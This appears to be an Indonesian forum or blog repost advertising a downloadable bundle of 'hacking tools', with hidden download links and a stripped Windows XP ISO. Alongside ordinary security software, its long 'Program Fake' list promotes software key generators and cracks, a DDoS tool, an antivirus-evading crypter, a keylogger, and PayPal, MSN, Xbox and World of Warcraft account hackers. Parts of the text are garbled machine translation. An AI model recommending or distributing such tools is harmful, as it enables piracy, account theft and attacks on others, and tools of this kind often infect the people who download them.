Aircrack-ng

Network Tools ** **
--------------------------------------
Blues Port Scanner
NetTools v5
Nmap 5,21 - Windows verion
Snort 2.8.5.3 - Windows verion

** Web Hacking Tools **
--------------------------------------
Admin Finder
XSS Scanner
SQL MoHackz Pemeras

** ** Exe Tools
--------------------------------------
(smart perakitan) Enterprise 4,1
BinText
Dis #
OllyDbg
Resource Hacker

Miscellaneous ** **
--------------------------------------
Mess Mania v5.0
Ex-Downloader
Metasploit 3.3.3
Visual Basic 6 Portable
Xash Undetector

Program Fake 75 ** **
--------------------------------------
Adobe Photoshop CS4 Key Gen
Akvis Key Generator
AnonT_2
AutoDesk 3ds Max [JaMu]
Avast Key Generator
Avatar The Game Key Gen
AVG Internet Security 9,0 [JaMu]
Avira Premium [JaMu]
Batman Arkham Asylum Key Gen
BitDefender 2010 [JaMu]
Camfrog Valid [JaMu]
Call Of Duty: Moder Warfare 2 Multi [JaMu]
Convert X ke DVD
Corelx
DDoSeR 3,6
DIRT2
Dreamweaver CS4 Key Gen
Lambang FUD Crypter
Fake Uap [JaMu]
Fallout
FarCry2 Multi-[JaMu]
FIFA 2010 Key Generator
Ghost Recon Multi-[JaMu]
Half-Life 2 Key Generator
Kaspersky Internet Security 2009 Key Gen
Kaspersky Key Generator 2010
KasKeygenRevised
Key Generator Harry potter
Leftdead
Lord of Rings: The Return of King Multi-[JaMu]
MSDN Admin Generator
MSN SpyBox Key Generator
Multi-Hacker
Modern Warefare 2 Online Patch
Nero 8 Ultra Edition [JaMu]
Nero [JaMu]
Netflix Activator
Ninja Blade [JaMu]
Norton 2010 Key Gen
Kantor Key Gen
Hack Paltalk Cam Mode
Panda Security 2010 Key Generator
Uang Paypal Hack
Account Paypal Verifier
Hacker sempurna Orkut Versi 1.0
Sempurna MSN Hacker v 2,1
Program Fake Plutoniums
Poker hack
Pro Show Gold Key Generator
Robert Pettinson Tema Generator
Rogue Warrior Key Generator
Runscape Key Gen
Trainer Hack ***** Ruscape Mode
Sony Vegas Pro 9,0 [JaMu]
Sound Forge 9 Kunci
Sound Forge 10 Key Generator
Street Fighter IV [JaMu]
Anti-virus SuperLite Tetap
TeamPROXi - Website tdk diundang
TeamViewer Patch
The Sims 3 Key Generator
Tibia
TV
TV Movie 5,0 Online
Vengeance Keylogger 1,0
VIP Adder
Virtual DJ Semua Versi [JaMu]
Webhack
Windows 7 [JaMu]
Windows 7 Serial Generator
Windows XP Key Generator
Windows Activator
World of Warcraft Account Hacker
Xbox Live Account Hacker
Youtube Hack Tool
Spoiler Download


lanjut gan
Posted Image
Spoiler Download


haduh cape juga fiuwww
Posted Image

Spoiler Download


huhhhhhhh udah deh kriting udah tangan ane

Agan2 pasti sering tau apa itu admin password. ya misal pada warnet , seorang admin akan memberikan password pada user admin sehingga client tidak dapat mengakses user tsb. nahh.... tadi pas jalan2 di forum orang bule.. gw dpt aplikasi bagus gan..

nah.. gw tertarik bgt tuh... lgsg aja gw klik....
Spoiler Download


haduhhhh bentar ane minum dolo yah sedot dolo akhhhh
glek...,,,, glek...,,, gle.....,,,, akkkhhhh seruput! nendangg....,,,,!! cuman gope
Posted Image


| Windows XP Gamer Edition | ISO | 89 MB |

Ini adalah versi slimmed down dari
Windows XP. Hal ini sangat cepat karena tidak memiliki banyak omong kosong
yang biasanya rawa bawah Windows seperti Internet Explorer. Tidak ada serial
diperlukan untuk menginstal dan OS tidak perlu diaktifkan.
Perfect OS untuk gamer!


System Requirements:
800 Mhz or greater CPU
64 mb RAM
700mb HD space
13 processes running on default install.
Full ISO is only 92 mb!
How to use:
Burn it to a cd and install
Size : 89 MB

http://www.easy-shar...ition.part1.rar
http://www.easy-shar...ition.part2.rar

credit by idon hekker <---- sory ane udah baca di rules "jgn promosikan link web lain"

gan link downloadnya dimana ya!! ane dah cari di google tapi link palsu semua.....

nice share gan.....

Silahkan Gunakan Facebook Comment, Jika Anda Tidak Memiliki Url Blog!

Like Facebook ya! Follow Twitter mu by Invader's , Ingin ingin menerima posting terbarunya? TWITTER?

0 komentar:

Related Posts Plugin for WordPress, Blogger...

Total Tayangan Laman

Translate